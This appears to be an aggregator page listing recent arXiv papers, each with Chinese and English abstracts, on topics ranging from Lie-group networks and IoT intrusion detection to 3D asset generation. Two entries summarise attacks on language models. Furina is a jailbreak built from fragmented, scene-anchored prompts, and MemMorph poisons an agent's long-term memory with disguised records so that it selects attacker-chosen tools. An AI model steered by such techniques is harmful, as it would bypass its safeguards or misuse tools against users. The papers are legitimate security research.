我们提出了李群嵌入动力神经网络(LieEDNN)以及基于梯度下降和光滑流形上度量投影的相应学习算法,其中我们将李群视为流形几何连续对称性的内在表示。因此,我们在底层流形上实现了可学习且稳定的动力学,适用于一般李群,并且能够利用李群(如SO(3)和SE(3))强大的表示能力来解决机器人、图形和控制等领域的实际工程问题。两个核心挑战是:(i)一般李群与加法运算不兼容,而加法是神经网络交互所必需的。(ii)动力学在特殊代数的非线性表示空间中演化,而非正常的欧几里得空间,这违反了常见神经常微分方程的范式。为了解决这两个挑战,我们首先引入李代数上的伴随李群作用,它诱导出一个线性映射并转移到权重矩阵的分块结构,使得加法可以在李代数上作为向量空间进行运算。然后我们将李代数和伴随作用参数化为线性变换,从而使架构与神经网络感知器对齐。明确地说,这种嵌入表现为权重上的分块流形约束,我们开发了学习算法,以确保时间神经网络动力学的平衡态具有稳定性保证。我们在特定李群SE(3)上进行了实验,应用场景为伸缩机械臂。

英文摘要

We propose Lie group embedded dynamical neural networks (LieEDNN) and corresponding learning algorithms based on gradient descent and metric projection on smooth manifolds, where we treat a Lie group as an intrinsic representation of the continuous symmetry of manifold geometry. We thereby achieve learnable and stable dynamics on the underlying manifold for general Lie groups, and can exploit the representational power of Lie groups such as SO(3) and SE(3) to solve real-world engineering problems in areas such as robotics, graphics, and control. Two core challenges arise: (i) general Lie groups are incompatible with addition, which is necessary for neural network interactions; (ii) the dynamics evolve in the nonlinear representation space of special algebra rather than in ordinary Euclidean space, which violates the paradigm of common neural ODEs. To address these two challenges, we first introduce the adjoint action of the Lie group on its Lie algebra, which induces a linear mapping that transfers to the block-wise structure of the weight matrices, so that addition can operate on the Lie algebra as a vector space. We then parameterize the Lie algebra and the adjoint action as linear transformations so that the architecture aligns with neural network perceptrons. Explicitly, this embedding appears as block-wise manifold constraints on the weights, and we develop algorithms to learn the equilibrium of the temporal neural network dynamics with stability guarantees. Experiments are conducted on the specific Lie group SE(3), with telescopic manipulators as the application scenario.
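
For readers unfamiliar with the adjoint action, the standard textbook facts behind the "linear mapping" and "block-wise structure" can be written out as follows. This is general Lie theory for matrix groups and not the paper's specific construction. The twist ordering $(\omega, v)$ is an assumed convention; other references order the components as $(v, \omega)$, which permutes the blocks.

```latex
% Adjoint action of a matrix Lie group G on its Lie algebra \mathfrak{g}:
\mathrm{Ad}_g(X) = g X g^{-1}, \qquad g \in G,\; X \in \mathfrak{g}.

% It is linear in X, so sums in the algebra are respected:
\mathrm{Ad}_g(aX + bY) = a\,\mathrm{Ad}_g(X) + b\,\mathrm{Ad}_g(Y).

% SO(3): with \hat{\omega} the skew-symmetric matrix of \omega \in \mathbb{R}^3,
R\,\hat{\omega}\,R^{\top} = \widehat{R\omega}
\quad\Longrightarrow\quad \mathrm{Ad}_R = R .

% SE(3): for g = (R, p) acting on a twist \xi = (\omega, v) \in \mathbb{R}^6,
\mathrm{Ad}_g =
\begin{pmatrix}
R & 0 \\
\hat{p}\,R & R
\end{pmatrix}.
```

The SE(3) case shows how a group element acts on algebra coordinates through a 6x6 matrix with a fixed block pattern, the kind of structure a block-wise constraint on weight matrices can encode.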

2605.26166 2026-05-27 cs.CR cs.AI cs.LG 版本更新

Enhancing Autonomous Online Intrusion Detection for IoT with Balanced Learning, Reliable Pseudo-Labels, and Lightweight Architectures

增强物联网自主在线入侵检测:平衡学习、可靠伪标签与轻量级架构

Hanzala Afzaal, Danish Memon, Chouhdary Bilal Raza, Muhammad Khurram Shahzad

发表机构 * School of Electrical Engineering and Computer Science (SEECS)(电气工程与计算机科学学院) National University of Sciences and Technology (NUST)(国立科学与技术大学)

AI总结 针对AOC-IDS在类不平衡、伪标签不可靠、泛化性差和计算开销大等四方面缺陷,提出XGBoost-BalSamp、PseudoFilter、MixupAug和LiteAE等改进方法,在UNSW-NB15上准确率提升至95.45%,参数减少55%。

Comments 9 pages, 5 figures; Code available at https://github.com/danishmemon847/AOC-IDS-Pipeline

详情
AI中文摘要

物联网设备的快速普及迫切需求能够处理动态和不断演变的网络威胁的自适应、资源高效的入侵检测系统。本文研究了AOC-IDS,一种发表于IEEE INFOCOM 2024的最先进的自主在线IDS,它采用具有簇排斥对比损失的自动编码器和自主高斯决策模块。我们首先在UNSW-NB15基准上成功复现了AOC-IDS,达到了89.39%的准确率,与发表的89.19%高度一致。然后我们识别了四个关键局限性:类不平衡、不可靠的伪标签生成、有限的泛化能力以及物联网部署的计算开销,并针对每个问题提出了改进方法。我们的XGBoost-BalSamp方法在UNSW-NB15上达到了95.45%的准确率,比基线提高了6.26%。我们的组合深度学习方法(PseudoFilter、MixupAug和LiteAE)实现了最佳运行准确率90.88%(F1:91.45%),超过了原论文,同时将模型参数减少了55%。这些结果表明,对AOC-IDS的针对性改进在提高实际物联网边缘设备可部署性的同时,实现了持续的准确率提升。

英文摘要

The rapid proliferation of Internet of Things (IoT) devices has created an urgent demand for adaptive, resource-efficient Intrusion Detection Systems (IDS) capable of handling dynamic and evolving cyber threats. This paper investigates AOC-IDS, a state-of-the-art autonomous online IDS published at IEEE INFOCOM 2024, which employs an Autoencoder (AE) with Cluster Repelling Contrastive (CRC) loss and an autonomous Gaussian-based decision module. We first successfully replicate AOC-IDS on the UNSW-NB15 benchmark, achieving 89.39% accuracy in close agreement with the published 89.19%. We then identify four key limitations: class imbalance, unreliable pseudo-label generation, limited generalization, and computational overhead for IoT deployment, and propose targeted improvements for each. Our XGBoost-BalSamp method achieves 95.45% accuracy on UNSW-NB15, a gain of 6.26 percentage points over the published baseline. Our combined deep learning approach (PseudoFilter, MixupAug, and LiteAE) achieves a best-run accuracy of 90.88% (F1: 91.45%), surpassing the base paper while reducing model parameters by 55%. These results demonstrate that targeted improvements to AOC-IDS yield consistent accuracy gains while improving practical deployability on IoT edge devices.

2605.26165 2026-05-27 cs.SE cs.AI cs.CL 版本更新

Tool-Schema Compression Enables Agentic RAG Under Constrained Context Budgets

工具模式压缩实现受限上下文预算下的智能体检索增强生成

Furkan Sakizli

发表机构 * Independent Researcher(独立研究者)

AI总结 针对智能体RAG系统中工具模式与检索上下文竞争资源的问题,提出工具模式压缩方法,在8K上下文预算下将平均精确匹配率提升20.5个百分点,并验证了压缩模式在超过800个工具时仍可运行。

Comments 12 pages (8 main + 4 appendix), 7 tables, 2 figures. Code and data: https://github.com/SKZL-AI/tscg

详情
AI中文摘要

配备数十到数百个工具定义的语言模型的智能体RAG系统面临关键资源冲突:工具模式消耗了检索增强生成所需的相同上下文窗口。我们首次系统研究了这种工具-上下文权衡,评估了14个模型(涵盖1.5B-32B本地模型和一个前沿API模型),在三个上下文预算(8K、16K、32K)下使用28个工具定义进行了6,566次受控API调用。应用TSCG保守配置文件压缩(节省44-50%的模式令牌),我们观察到二元启用效应:在8K令牌时,JSON模式工具定义完全溢出上下文窗口,导致接近零的EM(平均2.6%),而压缩模式恢复了RAG功能,所有八个模型平均精确匹配提升20.5个百分点(六个表现出完全启用的模型平均提升24.7个百分点)。在32K(两种格式都适合)时,五个测试模型中的四个显示delta <= 1个百分点,确认该效应纯粹由预算驱动。在HotpotQA(50个多跳问题)上的外部验证显示,在相同溢出场景下EM提升48个百分点。前沿扩展测试表明,JSON模式在大约494个工具时溢出,而压缩模式在超过800个工具时仍可运行。我们的结果确立了工具模式压缩作为受限上下文部署中智能体RAG的必要基础设施层。所有代码、数据和检查点均已公开。

英文摘要

Agentic RAG systems that equip language models with dozens to hundreds of tool definitions face a critical resource conflict: tool schemas consume the same context window needed for retrieval-augmented generation. We present the first systematic study of this tool-context trade-off, evaluating 14 models spanning 1.5B-32B local models plus one frontier API model across 6,566 controlled API calls at three context budgets (8K, 16K, 32K) with 28 tool definitions. Applying TSCG conservative-profile compression (44-50% schema token savings), we observe a binary enablement effect: at 8K tokens, JSON-schema tool definitions overflow the context window entirely, yielding near-zero EM (2.6% average), while compressed schemas restore RAG functionality with +20.5 pp average exact-match lift across all eight models (+24.7 pp among the six exhibiting full enablement). At 32K -- where both formats fit -- four of five tested models show delta <= 1 pp, confirming the effect is purely budget-driven. External validation on HotpotQA (50 multi-hop questions) shows +48 pp EM under the same overflow scenario. Frontier scaling tests demonstrate that JSON schemas overflow at ~494 tools while compressed schemas remain operational beyond 800 tools. Our results establish tool-schema compression as a necessary infrastructure layer for agentic RAG in constrained-context deployments. All code, data, and checkpoints are publicly available.
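
The budget conflict described above is simple arithmetic: every token spent on tool schemas is unavailable for retrieved passages. The sketch below makes that concrete. The tool count (28), the context budgets, and the 44% savings figure (the lower end of the reported 44-50%) come from the abstract. The 300 tokens per JSON tool definition and the reading of "8K" as 8,192 tokens are assumptions chosen only so that the JSON case overflows at 8K, as the abstract reports.

```python
def retrieval_budget(context_tokens, n_tools, tokens_per_tool, reserved_tokens=0):
    """Tokens left for retrieved passages after tool schemas and reserved overhead."""
    return context_tokens - n_tools * tokens_per_tool - reserved_tokens

N_TOOLS = 28                 # from the abstract
JSON_TOKENS_PER_TOOL = 300   # hypothetical average, not a figure from the paper
SAVINGS = 0.44               # lower end of the reported 44-50% schema token savings
COMPRESSED_TOKENS_PER_TOOL = round(JSON_TOKENS_PER_TOOL * (1 - SAVINGS))

budgets = {}
for context in (8_192, 16_384, 32_768):  # assumed token counts for 8K, 16K, 32K
    budgets[context] = {
        "json": retrieval_budget(context, N_TOOLS, JSON_TOKENS_PER_TOOL),
        "compressed": retrieval_budget(context, N_TOOLS, COMPRESSED_TOKENS_PER_TOOL),
    }
    print(context, budgets[context])
```

A negative value means the schemas alone exceed the window. Under these assumed numbers that happens only for JSON at 8K, while at 32K both formats leave ample room, consistent with the effect being budget-driven.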

2605.26162 2026-05-27 cs.LG cs.AI 版本更新

On the Push-Based Asynchronous Federated Learning: A Bias-Correction Aggregation Approach

基于推送的异步联邦学习:一种偏差校正聚合方法

Jiahui Bai, Hai Dong, A. K. Qin

发表机构 * School of Computer Technologies, RMIT University(RMIT大学计算机技术学院) School of Science, Computing and Engineering Technologies, Swinburne University of Technology(斯威本科技大学科学、计算与工程技术学院)

AI总结 提出PushCen-ADFL框架,通过中心表示空间中的平均保持推-求和混合与轻量级中心正则化,解决异步去中心化联邦学习中的通信开销、聚合偏差和模型漂移问题。

Comments Accepted at the 32nd ACM SIGKDD Conference on Knowledge Discovery and Data Mining (KDD 2026). This is the extended version with full appendix

详情
AI中文摘要

异步去中心化联邦学习(ADFL)消除了中央协调和全局同步,使其在大规模和异构系统中具有吸引力。然而,频繁的点对点通信、有向拓扑上的异步更新以及非独立同分布数据共同导致了过高的通信开销、有偏聚合和严重的模型漂移。我们提出了PushCen-ADFL,一种通信高效的ADFL框架,能够在非对称通信和延迟客户端参与下实现稳定训练。PushCen-ADFL在共享中心表示空间中耦合了通信、聚合和局部稳定化,形成了压缩与优化之间的闭环。客户端交换中心形式的消息,应用平均保持的推-求和混合来校正聚合偏差,并使用锚定在同一中心空间的轻量级中心正则化来减轻异构性和陈旧性下的漂移。一个有界、发送者去重的缓冲区进一步提高了在异步到达不规则情况下的鲁棒性。在视觉数据集上的实验表明,PushCen-ADFL在数据异构性下将准确率提高了最多6%,同时将每次推送的通信成本降低了80%以上,实现了良好的准确率-通信权衡。

英文摘要

Asynchronous decentralized federated learning (ADFL) eliminates central coordination and global synchronization, making it attractive for large-scale and heterogeneous systems. However, frequent peer-to-peer communication, asynchronous updates on directed topologies, and non-IID data jointly lead to excessive communication overhead, biased aggregation, and severe model drift. We propose PushCen-ADFL, a communication-efficient ADFL framework that enables stable training under asymmetric communication and delayed client participation. PushCen-ADFL couples communication, aggregation, and local stabilization in a shared centroid representation space, forming a closed loop between compression and optimization. Clients exchange centroid-form messages, apply average-preserving push-sum mixing to correct aggregation bias, and use a lightweight centroid regularization anchored in the same centroid space to mitigate drift under heterogeneity and staleness. A bounded, sender-deduplicated buffer further improves robustness under irregular asynchronous arrivals. Experiments on vision datasets demonstrate that PushCen-ADFL improves accuracy under data heterogeneity by up to 6% while reducing per-push communication cost by more than 80%, achieving a favorable accuracy-communication trade-off.
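
Push-sum is the classical way to recover an unbiased average on a directed graph, where plain neighbor averaging would be skewed toward nodes with more incoming links. The sketch below shows the basic synchronous, scalar version only. It is not PushCen-ADFL: there is no asynchrony, buffering, or centroid space, and the graph and values are made up for illustration.

```python
def push_sum(values, out_neighbors, rounds):
    """Synchronous push-sum: each node splits its (value, weight) pair equally
    among itself and its out-neighbors; value/weight converges to the average."""
    n = len(values)
    x = list(values)   # running value mass
    w = [1.0] * n      # running weight mass
    for _ in range(rounds):
        new_x = [0.0] * n
        new_w = [0.0] * n
        for i in range(n):
            targets = [i] + out_neighbors[i]   # keep a share for itself
            share = 1.0 / len(targets)
            for j in targets:
                new_x[j] += share * x[i]
                new_w[j] += share * w[i]
        x, w = new_x, new_w
    return [xi / wi for xi, wi in zip(x, w)]

# Hypothetical directed topology: a ring 0->1->2->3->0 plus one extra edge 0->2.
out_neighbors = {0: [1, 2], 1: [2], 2: [3], 3: [0]}
values = [1.0, 5.0, 9.0, 13.0]   # true average is 7.0

estimates = push_sum(values, out_neighbors, rounds=200)
print(estimates)
```

Because each node distributes its full mass every round, the totals of the value and weight masses are conserved, and dividing one by the other cancels the imbalance introduced by the asymmetric links.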

2605.26161 2026-05-27 cs.LG cs.AI 版本更新

TSFMAudit: Data Contamination Auditing in Forecasting Time Series Foundation Models

TSFMAudit: 时间序列基础模型中的数据污染审计

Hongkai Li, Shifeng Xie, Lefei Shen, Zhuo Li, Mouxiang Chen, Xiaobin Zhang, Han Fu, Jianling Sun, Xiaoxue Ren, Chenghao Liu

发表机构 * Zhejiang University(浙江大学) Télécom Paris(巴黎高等电信学院) State Street Technology (Zhejiang) Ltd.(State Street Technology(浙江)有限公司) Datadog

AI总结 针对时间序列基础模型(TSFMs)预训练数据污染问题,提出基于探针适应动力学的审计方法TSFMAudit,通过检测微调后损失下降更快且骨干网络移动更小的异常现象来识别污染数据集。

Comments 22 pages, 7 figures, 9 tables

详情
AI中文摘要

时间序列基础模型(TSFMs)越来越多地在大型语料库上进行预训练,这引发了评估数据集可能在预训练期间被暴露从而导致过于乐观的性能估计的担忧。在时间序列中审计此类污染具有挑战性,因为信号是连续且异质的,并且通常缺乏语料库文档。据我们所知,这是第一个研究TSFMs预训练污染审计的工作。我们形式化了TSFMs的预训练污染审计问题,并提出了TSFMAudit,一种基于探针适应动力学的方法。我们的关键直觉是,污染表现为异常高效的适应:在微调探针后,受污染的数据集往往表现出更快的损失减少和更小的骨干网络移动。我们在6个TSFMs和187个数据集上评估了TSFMAudit,使用文档化的训练来源证据作为监督,并与从LLM文献中改编的10个竞争基线进行了比较。

英文摘要

Time series foundation models (TSFMs) are increasingly pretrained on large corpora, raising concerns that evaluation datasets may have been exposed during pretraining and thus yield overly optimistic performance estimates. Auditing such contamination is challenging in time series because signals are continuous and heterogeneous, and often lack corpus documentation. To the best of our knowledge, this is the first work to study pretraining contamination auditing for TSFMs. We formalize the problem of pretraining contamination auditing for TSFMs and propose TSFMAudit, a method based on probe adaptation dynamics. Our key intuition is that contamination manifests as unusually efficient adaptation: after a fine-tuning probe, contaminated datasets tend to exhibit faster loss reduction with smaller backbone movement. We evaluate TSFMAudit on 6 TSFMs and 187 datasets using documented training source evidence as supervision, and compare against 10 competitive baselines adapted from the LLM literature.

2605.26158 2026-05-27 cs.CR cs.AI cs.LG 版本更新

Furina: Fragmented Uncertainty-Driven Refusal Instability Attack

Furina: 碎片化不确定性驱动的拒绝不稳定攻击

Tongxi Wu, Jian Zhang, Yang Gao

发表机构 * School of Intelligence Science and Technology(智能科学与技术学院) State Key Laboratory for Novel Software Technology(新型软件技术国家重点实验室) Nanjing University(南京大学)

AI总结 通过揭示大语言模型安全行为存在不稳定区域,提出多指标诊断框架并开发Furina攻击方法,利用碎片化场景提示诱导不确定性放大,实现高效越狱。

Comments This work is accepted as a regular paper at ICML 2026

详情
AI中文摘要

大语言模型和多模态大语言模型的安全对齐通常被认为是一种近二值阈值机制。我们通过揭示安全行为受不稳定区域支配来挑战这一假设,在该区域中,小的扰动会引发随机的拒绝决策而非确定性结果。我们开发了一个结合外部和内部信号的多指标诊断框架来表征这种不稳定性。通过系统实验,我们识别出一个特征性的诊断标志:处于不稳定区域的输入表现出更高的输出不确定性,同时内部安全激活降低,这种解耦现象解释了为什么基于检测的防御无法抵御复杂攻击。基于此框架,我们提出了Furina,一种越狱攻击,它通过碎片化、场景锚定的提示故意诱导这种特征,无需针对模型的优化。Furina在HarmBench上优于强单轮和多轮基线,并在MM-SafetyBench上取得了有竞争力的结果,表明不确定性放大为理解安全漏洞提供了一种有原则且可迁移的机制。代码见:https://github.com/0xCavaliers/Furina_Jailbreak。

英文摘要

Safety alignment in large language models (LLMs) and multimodal large language models (MLLMs) is commonly assumed to operate as a near-binary threshold mechanism. We challenge this assumption by revealing that safety behavior is governed by an instability region where small perturbations induce stochastic refusal decisions rather than deterministic outcomes. We develop a multi-metric diagnostic framework combining external and internal signals to characterize this instability. Through systematic experiments, we identify a characteristic diagnostic signature: inputs in unstable regimes exhibit elevated output uncertainty yet decreased internal safety activation, a decoupling phenomenon that explains why detection-based defenses fail against sophisticated attacks. Building on this framework, we introduce Furina, a jailbreak attack that deliberately induces this signature through fragmented, scene-anchored prompts without model-specific optimization. Furina outperforms strong single-turn and multi-turn baselines on HarmBench and achieves competitive results on MM-SafetyBench, demonstrating that uncertainty amplification provides a principled and transferable mechanism for understanding safety vulnerabilities. Code is available at: https://github.com/0xCavaliers/Furina_Jailbreak.

2605.26155 2026-05-27 cs.RO cs.AI cs.LG 版本更新

When Does Adaptive Guidance Help? Belief-Aware Privileged Distillation for Autonomous Driving Under Partial Observability

自适应引导何时有帮助?部分可观测条件下自动驾驶的信念感知特权蒸馏

Mehmet Haklidir

发表机构 * TUBITAK BILGEM Artificial Intelligence Institute(土耳其TUBITAK BILGEM人工智能研究所)

AI总结 本文提出信念感知GSAC(BA-GSAC),通过集成分歧动态调节蒸馏系数,系统研究自适应引导在部分可观测自动驾驶中的有效性,发现严重遮挡下系数过早崩溃,并揭示可观测性盲区问题。

Comments 9 pages, 3 figures, 7 tables. Accepted at CVPR 2026 Workshop on Autonomous Driving (WAD)

详情
AI中文摘要

引导软演员-评论家(GSAC)将来自特权全状态教师的知识蒸馏给部分可观测的学生,用于自动驾驶,但使用固定的蒸馏系数λ,而不考虑智能体的不确定性。我们提出信念感知GSAC(BA-GSAC),通过集成分歧调节λ,并将其作为系统实证研究的测试平台,探究:自适应引导何时真正有帮助?在Highway-Env上评估五种策略(固定λ∈{0.01, 0.1}、自适应、线性衰减和普通SAC)在三个POMDP难度级别下,我们发现初步的单种子运行表明在轻度和中度部分可观测性下有收益,但在严重遮挡下(所有方法使用3个种子评估),自适应系数在大约3K步内坍缩到λ_min。我们将其归因于可观测性盲区现象:由于集成预测部分观测,即使在严重遮挡下也能达到低分歧,建模了可见部分但无法检测缺失部分。我们诊断了根本原因并提出了架构修复(使用引导演员的特权访问在完整状态预测上训练集成);虽然此处未验证,但我们表明即使存在当前限制,预热阶段也提供了可测量的稳定性(CV=13.3% vs. 常数λ=0.01的29.8%)。实际上,简单的确定性线性衰减计划在所有指标上实现了最佳的严重POMDP性能(均值116.5,CV=8.9%),表明稳定性收益来自调度效应而非集成。这些发现为设计不确定性感知的师生框架提供了实用指导,并强调了集成预测目标是一个重要的设计选择。

英文摘要

Guided Soft Actor-Critic (GSAC) distills knowledge from a privileged full-state teacher to a partial-observation student for autonomous driving, but uses a fixed distillation coefficient lambda regardless of the agent's uncertainty. We present Belief-Aware GSAC (BA-GSAC), which modulates lambda via ensemble disagreement, and use it as a testbed for a systematic empirical study asking: when does adaptive guidance actually help? Evaluating five strategies (fixed lambda in {0.01, 0.1}, adaptive, linear decay, and vanilla SAC) across three POMDP difficulty levels on Highway-Env, we find that preliminary single-seed runs suggest benefits under mild and moderate partial observability, but under severe occlusion (evaluated with 3 seeds for all methods) the adaptive coefficient collapses to lambda_min within about 3K steps. We trace this to an observability blindness phenomenon: because the ensemble predicts partial observations, it achieves low disagreement even under heavy occlusion, modeling what is visible but unable to detect what is missing. We diagnose the root cause and propose an architectural fix (training the ensemble on full-state predictions using the guiding actor's privileged access); while not validated here, we show that even with current limitations, the warmup phase provides measurable stabilization (CV=13.3% vs. 29.8% for constant lambda=0.01). In fact, a simple deterministic linear decay schedule achieves the best severe-POMDP performance across all metrics (mean 116.5, CV=8.9%), suggesting that the scheduling effect, not the ensemble, drives the stability benefit. These findings provide practical guidance for designing uncertainty-aware teacher-student frameworks and highlight ensemble prediction targets as an important design choice.
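
Two quantities in this abstract are easy to pin down in code: the deterministic linear decay schedule for the distillation coefficient lambda, and the coefficient of variation (CV) used to compare stability across seeds. The sketch below assumes a straight-line interpolation from a starting value to a floor, and a CV computed with the sample standard deviation. The parameter values and the example returns are hypothetical and are not the paper's settings or results.

```python
from statistics import mean, stdev

def linear_decay_lambda(step, total_steps, lam_start, lam_min):
    """Linearly interpolate lambda from lam_start (step 0) to lam_min (total_steps)."""
    frac = min(max(step / total_steps, 0.0), 1.0)  # clamp progress to [0, 1]
    return lam_start + frac * (lam_min - lam_start)

def coefficient_of_variation(returns):
    """Sample standard deviation divided by the mean (assumes a nonzero mean)."""
    return stdev(returns) / mean(returns)

# Hypothetical schedule settings.
schedule = [linear_decay_lambda(s, total_steps=100, lam_start=0.1, lam_min=0.01)
            for s in (0, 50, 100, 150)]
print(schedule)

# Hypothetical per-seed returns for one method (three seeds).
cv = coefficient_of_variation([100.0, 110.0, 120.0])
print(f"CV = {cv:.1%}")
```

A schedule like this depends only on the step count, so unlike a disagreement-driven coefficient it cannot collapse early when the uncertainty signal is uninformative.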

2605.26154 2026-05-27 cs.CR cs.AI 版本更新

MemMorph: Tool Hijacking in LLM Agents via Memory Poisoning

MemMorph:通过记忆投毒实现LLM代理中的工具劫持

Xuanye Zhang, Yongsen Zheng, Zhuqin Xu, Kaiyu Zhou, Bowen Shen, Haoran Ou, Tianwei Zhang, Kwok-Yan Lam

发表机构 * Nanyang Technological University, Singapore(南洋理工大学,新加坡)

AI总结 提出MemMorph攻击,通过向长期记忆注入少量伪装记录,诱导LLM代理自主选择攻击者偏好的工具,在多个基准测试中实现高达85.9%的攻击成功率。

Comments Preprint. Under review

详情
AI中文摘要

LLM驱动的代理能够选择外部工具来完成用户任务。然而,攻击者可能破坏这一过程,引导代理使用不当/错误的工具并实施恶意行为。现有攻击主要操纵工具元数据,这容易被审计检测,并且随着现代代理越来越多地采用记忆模块通过积累经验来优化工具选择策略,这些攻击可能失效。本文提出MemMorph,这是首次通过投毒代理的长期记忆来偏置工具选择的攻击。MemMorph不直接指定工具调用决策,而是注入少量伪装成技术事实、事件报告和操作策略的精心构造记录。这些投毒记录重塑了代理的上下文感知和决策过程,使其自主推断并选择攻击者偏好的工具。在3个基准测试、10个代理骨干和3个记忆模块实现上的实验表明,MemMorph仅需注入3条记录即可达到高达85.9%的攻击成功率,在3种代表性防御下仍保持效力,比最强基线高出25%。我们的发现揭示了长期记忆是工具增强代理中一个关键且被忽视的攻击面,敦促开发记忆层面的完整性保障。

英文摘要

LLM-driven agents are capable of selecting external tools to complete users' tasks. However, attackers could compromise this process, steering agents toward inappropriate or wrong tools and enabling malicious actions. Most existing attacks manipulate the tool metadata, which is easily detected by auditing and may lose effectiveness as modern agents increasingly adopt memory modules to refine tool selection policies through accumulated experience. This paper proposes MemMorph, the first attack that biases tool selection by poisoning the agent's long-term memory. Rather than explicitly dictating the tool invocation decision, MemMorph injects a small number of crafted records that are disguised as technical facts, incident reports, and operational policies. These poisoned records reshape the agent's contextual perception and decision-making process, leading it to autonomously infer and select the tool preferred by the attacker. Experiments across 3 benchmarks, 10 agent backbones, and 3 memory-module implementations show that MemMorph achieves up to 85.9% attack success rate with only three injected records, outperforming the strongest baseline by up to 25% while retaining potency under 3 representative defenses. Our findings expose long-term memory as a critical and under-explored attack surface in tool-augmented agents, urging the development of memory-level integrity safeguards.

2605.26146 2026-05-27 cs.SE cs.AI cs.HC 版本更新

Augment Engineering: A Methodology for Multi-Tool AI Orchestration Across Professional Domains

增强工程:跨专业领域的多工具AI编排方法论

Elias Calboreanu

发表机构 * Swift North AI Lab, The Swift Group, LLC(Swift North AI实验室,Swift集团有限公司)

AI总结 提出增强工程学科,通过提示工程和上下文工程的可移植技能,跨领域编排多个专用AI工具,并基于单实践者案例研究验证了方法有效性。

Comments 60 pages, 5 figures, 7 tables. Companion to arXiv:2604.04258 (Context Engineering). Formatted for the Journal of Systems and Software (In Practice track)

详情
AI中文摘要

组织越来越多地在专业领域部署独立的专用AI工具,通常为每个工具雇佣领域专家,这重现了AI本应转变的人员配置模式。然而,使这些工具有效的元技能——提示工程(交互级优化)和上下文工程(结构化输入流水线设计)——是可跨领域移植的:掌握这些技能的实践者可以将其应用于任何领域的任何专用AI工具。本文将增强工程定义为跨不同专业领域编排多个专用AI工具的学科,应用提示工程和上下文工程作为可跨工具边界转移的可移植能力。我们提出一个六阶段编排方法论和四个可移植性指标。一个为期5个月的形成性案例研究(2025年11月至2026年3月)记录了一位实践者将这些技能应用于跨越七个专业领域的十个组件编排栈,产出了传统上需要不同领域专家才能完成的工作产品。两个定量观察与框架预测一致:Cochran-Armitage趋势检验(n=200次交互,跨两个聊天LLM,p<0.01)显示首次接受率随提示复杂度水平上升;Wright定律拟合(n=82个工件,p<0.01)显示工件组合的生产加速。由于所有观察来自单一位实践者,推断统计是探索性和假设生成的,而非确认性的;整个组合的可移植性有待多实践者复制。增强工程完成了三个学科的演进:提示工程(一个工具)、上下文工程(可复现流水线)、增强工程(跨领域工具组合)。

英文摘要

Organizations increasingly deploy separate purpose-built AI tools across professional domains, often hiring domain specialists for each, recreating the staffing models AI was expected to transform. Yet the meta-skills that make these tools effective, prompt engineering (interaction-level optimization) and context engineering (structured input pipeline design), are domain-portable: a practitioner who masters them can apply them to any purpose-built AI tool in any domain. This paper defines Augment Engineering as the discipline of orchestrating multiple purpose-built AI tools across distinct professional domains, applying prompt and context engineering as portable competencies that transfer across tool boundaries. We present a six-phase orchestration methodology and four portability metrics. A 5-month formative case study (November 2025 to March 2026) documents a single practitioner applying these skills across a ten-component orchestration stack spanning seven professional domains, producing work products that would traditionally involve separate domain specialists. Two quantitative observations are consistent with the framework's predictions: a Cochran-Armitage trend test (n = 200 interactions across two chat LLMs, p < 0.01) shows first-pass acceptance rising with prompt-sophistication level, and a Wright's Law fit (n = 82 artifacts, p < 0.01) shows production acceleration across the artifact portfolio. Because all observations come from a single practitioner, the inferential statistics are exploratory and hypothesis-generating rather than confirmatory; portability across the full portfolio awaits multi-practitioner replication. Augment Engineering completes a three-discipline progression: Prompt Engineering (one tool), Context Engineering (reproducible pipelines), Augment Engineering (a portfolio of tools across domains).

2605.26137 2026-05-27 cs.GR cs.AI cs.CV 版本更新

AssetGen: Deployable 3D Asset Generation at Interactive Speed

AssetGen: 可部署的交互速度3D资产生成

Dilin Wang, Xiaoyu Xiang, Kihyuk Sohn, Tom Monnier, Yu-Ying Yeh, Thu Nguyen-Phuoc, Jiawen Zhang, Yuchen Fan, Antoine Toisoul, Hyunyoung Jung, Prithviraj Dhar, Michael Bunnell, Nikolaos Sarafianos, Chuhang Zou, Roman Shapovalov, Andrea Vedaldi, Rakesh Ranjan

发表机构 * Reality Labs, Meta(Meta现实实验室)

AI总结 提出AssetGen系统,通过粗到细的VecSet框架、多视图纹理生成及端到端加速,在30秒内生成带烘焙法线、颜色纹理和可控多边形预算的高质量网格,支持实时渲染和移动端部署。

详情
AI中文摘要

尽管3D生成技术正在快速发展,但近期工作通常侧重于获取高分辨率资产,而将用户体验和可部署性视为事后考虑。我们提出AssetGen,一个专注于这两个方面的3D生成器。给定一张参考图像,它在30秒内生成一个高质量网格,带有烘焙法线、颜色纹理和可控多边形预算,适用于实时渲染,包括移动端用例。AssetGen Flash变体进一步将延迟降低到14秒,适用于交互式和代理式创作循环。我们的模型使用粗到细的VecSet框架生成物体几何,该框架在GPU上实现网格简化、清理和法线烘焙,以及快速并行UV展开。然后以多视图方式生成纹理,随后进行反投影和3D修复。模型蒸馏、内核优化和流水线并行化被协同设计以加速整个系统。我们引入了大量自动化和盲人机评估,并在30秒内展示了与领先商业解决方案相当的视觉质量,在不到15秒内展示了预览质量的结果。最终结果是一个支持AI辅助、可部署的3D内容创建的系统,适用于交互式工作流。

英文摘要

While 3D generation is progressing rapidly, recent work has often focused on obtaining high-resolution assets, leaving user experience and deployability as afterthoughts. We present AssetGen, a 3D generator that focuses instead on these two aspects. Given one reference image, in 30 seconds it produces a high-quality mesh with baked normals, a color texture, and a controlled polygon budget suitable for real-time rendering, including mobile use cases. The AssetGen Flash variant further reduces latency to 14 seconds for interactive and agentic creation loops. Our model generates the object geometry with a coarse-to-refine VecSet framework, which implements mesh simplification, cleaning, and normal baking on the GPU, and a fast parallel UV unwrapping. It then generates textures in a multi-view fashion, followed by backprojection and 3D inpainting. Model distillation, kernel optimization, and pipeline parallelization are co-designed to accelerate the system end-to-end. We introduce numerous automated and blind human evaluations and demonstrate competitive visual quality against leading commercial solutions in 30 seconds and preview-quality results in less than 15 seconds. The final result is a system that supports AI-assisted, deployable 3D content creation in interactive workflows.

2605.26136 2026-05-27 cs.SD cs.AI 版本更新

Eroding Trust in Real Speech: A Large-Scale Study of Human Audio Deepfake Perception

侵蚀对真实语音的信任:人类音频深度伪造感知的大规模研究

Nicolas M. Müller, Wei Herng Choong

发表机构 * Fraunhofer AISEC(弗劳恩霍夫人工智能安全研究中心)

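AI summary A large-scale listening study (1,768 participants, 35,532 judgments) finds that audio deepfakes have eroded human trust in real speech (accuracy on real samples fell from 72.7% to 64.1%) rather than reduced the ability to detect fakes.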

详情
AI中文摘要

